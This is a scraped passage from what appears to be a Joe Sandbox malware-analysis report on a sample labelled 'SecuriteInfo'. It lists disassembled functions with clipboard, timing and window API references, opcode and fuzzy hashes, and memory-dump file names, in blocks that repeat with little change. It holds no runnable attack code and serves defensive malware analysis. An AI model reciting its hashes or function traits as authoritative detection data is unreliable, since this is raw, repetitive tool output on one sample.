Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: ClipboardCloseCountGlobalMessagePeekTickUnlock
String ID:
API String ID: 1792675829-0
Opcode ID: 20a1fb2aa6619b2128788cb07f332ead3d4adfa78a5fd12a556c30ac19915eac
Instruction ID: b7f7f3840a8aca7ed14f2ce3285260060ee85ac4e4305fae1ee52ae8becb0611
Opcode Fuzzy Hash: 20a1fb2aa6619b2128788cb07f332ead3d4adfa78a5fd12a556c30ac19915eac
Instruction Fuzzy Hash: A7C17E32205B4486EB6B8B27E8907EA37A1F74DBD0F544116EB5A4BBF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400370F4 Relevance: 9.2, APIs: 6, Instructions: 208windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 2a8032c0c8e8ec6c420dfd97f26bad5a03f4f58a1b7ad3aeb04a4cddee6ee341
Instruction ID: f60f6f23d6e5d2b5788627842b4ec833d00f523fe85feed04d7fe58e04e7c6f5
Opcode Fuzzy Hash: 2a8032c0c8e8ec6c420dfd97f26bad5a03f4f58a1b7ad3aeb04a4cddee6ee341
Instruction Fuzzy Hash: D1A16E32604B4086FB6B8B27E8847EA37A2F78DBD4F544116EB594B6F5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140035E02 Relevance: 9.2, APIs: 6, Instructions: 205windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140053990: GetForegroundWindow.USER32 ref: 0000000140053AD9
Part of subcall function 0000000140053990: IsIconic.USER32 ref: 0000000140053AEA
Part of subcall function 0000000140053990: GetWindowRect.USER32 ref: 0000000140053AFF

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Window$ClipboardCloseForegroundGlobalIconicMessagePeekRectUnlock
String ID:
API String ID: 1613694844-0
Opcode ID: 24405871700a497dfded6db317bef8a028d351ae20f8b2e295cfc653a6f94e68
Instruction ID: 6e9c62cb7b95ed6cf880958df0dcf7c3dc5238f7105d27c5efe148ca8bfc2f58
Opcode Fuzzy Hash: 24405871700a497dfded6db317bef8a028d351ae20f8b2e295cfc653a6f94e68
Instruction Fuzzy Hash: 8FA14F3260574086EB6B8B27E8947EA77A1F74DBE4F140116EB5987BF5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032FFF Relevance: 9.2, APIs: 6, Instructions: 203windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: bcab57516af5449a16f489fadbc8afdd3f49c53b30938446aea660300bb9f69d
Instruction ID: d320799438a0abed5ba18e568616cf065276be98bb6642134c5c2e36aa7840a4
Opcode Fuzzy Hash: bcab57516af5449a16f489fadbc8afdd3f49c53b30938446aea660300bb9f69d
Instruction Fuzzy Hash: 54A16036605B4486EB6B8B27E8807EA77A1F74DBD4F540116EB9947BF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032A7B Relevance: 9.2, APIs: 6, Instructions: 199windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 2bc0808c8186147f6e9ca6eb047ded2a360e9ad3c30c32fc6585e1211fc37546
Instruction ID: c7f3e8fd837d06618d498678cc2e3abc4624add24a178d00e28c3d60e4f6fdde
Opcode Fuzzy Hash: 2bc0808c8186147f6e9ca6eb047ded2a360e9ad3c30c32fc6585e1211fc37546
Instruction Fuzzy Hash: B1A16E72205B4485EB6B8B2BE8847EA77A1FB4DBE4F144115EB99877F4DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140033012 Relevance: 9.2, APIs: 6, Instructions: 199windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 4251648c4b89d980894ab4cf8cf5d9bd2c4ddbd4d297c0a05384fb2ca86b939d
Instruction ID: e9bc7b2cdaa75be8767f00fcc36e50b25b02f9f2829837594e3b7d69a3e0a3c5
Opcode Fuzzy Hash: 4251648c4b89d980894ab4cf8cf5d9bd2c4ddbd4d297c0a05384fb2ca86b939d
Instruction Fuzzy Hash: CBA16036605B4486EB678B27E8847EA77A1F74DBD4F540116EB9947BF4DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400372A7 Relevance: 9.2, APIs: 6, Instructions: 198windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Part of subcall function 00000001400CA91C: _errno.LIBCMT ref: 00000001400CA934
Part of subcall function 00000001400CA91C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CA93F

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID:
API String ID: 130734711-0
Opcode ID: d9f7f49d87a709deb8f8a55dfe95421185815e2a73baa5c726ac3ae4d3c5f490
Instruction ID: 725b58427b6ac51515aa6201e5a913ca1247c193efa9d6ca02caa1a9ee284997
Opcode Fuzzy Hash: d9f7f49d87a709deb8f8a55dfe95421185815e2a73baa5c726ac3ae4d3c5f490
Instruction Fuzzy Hash: F0A18F31205B4486FB6B9B27E8947EA27A2F74DBE4F540116FB5A47AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037B63 Relevance: 9.2, APIs: 6, Instructions: 197windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Part of subcall function 00000001400570B0: SendMessageW.USER32(?,0000000140037B5E), ref: 0000000140057259

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountMessageTick$ClipboardCloseGlobalPeekSendUnlock
String ID:
API String ID: 38145316-0
Opcode ID: 1dc788a7215516a6033079bac0bb45f10942ad467b454f25580a0ee5531aa618
Instruction ID: 47ac6356f597cb80ee23c6ba58f06828198a150173a253eaa842aaadea1f118e
Opcode Fuzzy Hash: 1dc788a7215516a6033079bac0bb45f10942ad467b454f25580a0ee5531aa618
Instruction Fuzzy Hash: 31A1603260574086FB6B8B27E8847EA77A2F74DBD4F540116EB5A87AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140033084 Relevance: 9.2, APIs: 6, Instructions: 195windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014003C100: free.LIBCMT ref: 000000014003C1A5
Part of subcall function 000000014003C100: free.LIBCMT ref: 000000014003C263

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$free$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 2285768414-0
Opcode ID: 2cc8900ef77a1c591c0c8babb454b4d27428e6ab8bde4d4d8607e296b2963534
Instruction ID: fc41d4eea1aaaecc3104e62a637910e5feac394e24a0e194c34821f8d78b2d7b
Opcode Fuzzy Hash: 2cc8900ef77a1c591c0c8babb454b4d27428e6ab8bde4d4d8607e296b2963534
Instruction Fuzzy Hash: 89A17136605B4486EB678B27E8847EA37A1F74DBE4F140116EB9947BF4DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140033055 Relevance: 9.2, APIs: 6, Instructions: 194windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 7074a24cfa0307dd615133088044f34d4763f628f18b07a26f554998a33dda73
Instruction ID: 0111a0aecfe22ec7373bb30d43c5708bc68b8a5e4a2d30972a9dadeb06a53691
Opcode Fuzzy Hash: 7074a24cfa0307dd615133088044f34d4763f628f18b07a26f554998a33dda73
Instruction Fuzzy Hash: C4A17036605B448AEB6B8B27E8843EA37A1F74DBE4F540116EB5947BF4DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140033C24 Relevance: 9.2, APIs: 6, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140032520: GlobalUnlock.KERNEL32 ref: 00000001400325E1
Part of subcall function 0000000140032520: CloseClipboard.USER32 ref: 00000001400325EE
Part of subcall function 0000000140032520: GetTickCount.KERNEL32 ref: 0000000140032601
Part of subcall function 0000000140032520: PeekMessageW.USER32 ref: 0000000140032635
Part of subcall function 0000000140032520: GetTickCount.KERNEL32 ref: 0000000140032649

GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 9d76ab5fefc3e9439cfd2a65452ed0845ca4b3e2da1c8f143c36626eb308627b
Instruction ID: 4c46c5e3cf21e7805df779fec5096e27b104e47bf1492efcc39753d775f4f9fb
Opcode Fuzzy Hash: 9d76ab5fefc3e9439cfd2a65452ed0845ca4b3e2da1c8f143c36626eb308627b
Instruction Fuzzy Hash: DD919132205B4485FB6B8B27E8447EA77A1FB4DBE4F550116EB9947AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037071 Relevance: 9.2, APIs: 6, Instructions: 192windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Part of subcall function 00000001400CA91C: _errno.LIBCMT ref: 00000001400CA934
Part of subcall function 00000001400CA91C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400CA93F

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
String ID:
API String ID: 130734711-0
Opcode ID: ba7944bde02cccb331e17fbf8df54990b3a7181c61aa7eed86b4ed76e171274c
Instruction ID: 00f8e0d076901313a91d13f4a4ea2fcbe85b9c60953cf2096a672152426afe4a
Opcode Fuzzy Hash: ba7944bde02cccb331e17fbf8df54990b3a7181c61aa7eed86b4ed76e171274c
Instruction Fuzzy Hash: 08A16132205B4086FB6B8B27E8847DA77A1F74DBE4F544216EB99876F5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037983 Relevance: 9.2, APIs: 6, Instructions: 192windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 542e312c876e27fc5b23724b8d1b5eed6425b3bee1a73ca20922629a3329ea30
Instruction ID: fdf79aefef8f4363ddb75b45a85edaefe523847fdb03b74e2473ff0d407583eb
Opcode Fuzzy Hash: 542e312c876e27fc5b23724b8d1b5eed6425b3bee1a73ca20922629a3329ea30
Instruction Fuzzy Hash: 01917032205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB59876F5DB38C881C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037DFD Relevance: 9.2, APIs: 6, Instructions: 192windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: b8a625a1f4ad9f328f00606b4c27433ccf3a2b6efc09af7475048094053dd145
Instruction ID: e164f54dc53b239856a512ca1f192fe1b34daf79bc8636490c32d9a482640a14
Opcode Fuzzy Hash: b8a625a1f4ad9f328f00606b4c27433ccf3a2b6efc09af7475048094053dd145
Instruction Fuzzy Hash: 9C917D32204B4486FB6B8B27E8447EA37A2F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037541 Relevance: 9.2, APIs: 6, Instructions: 190windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
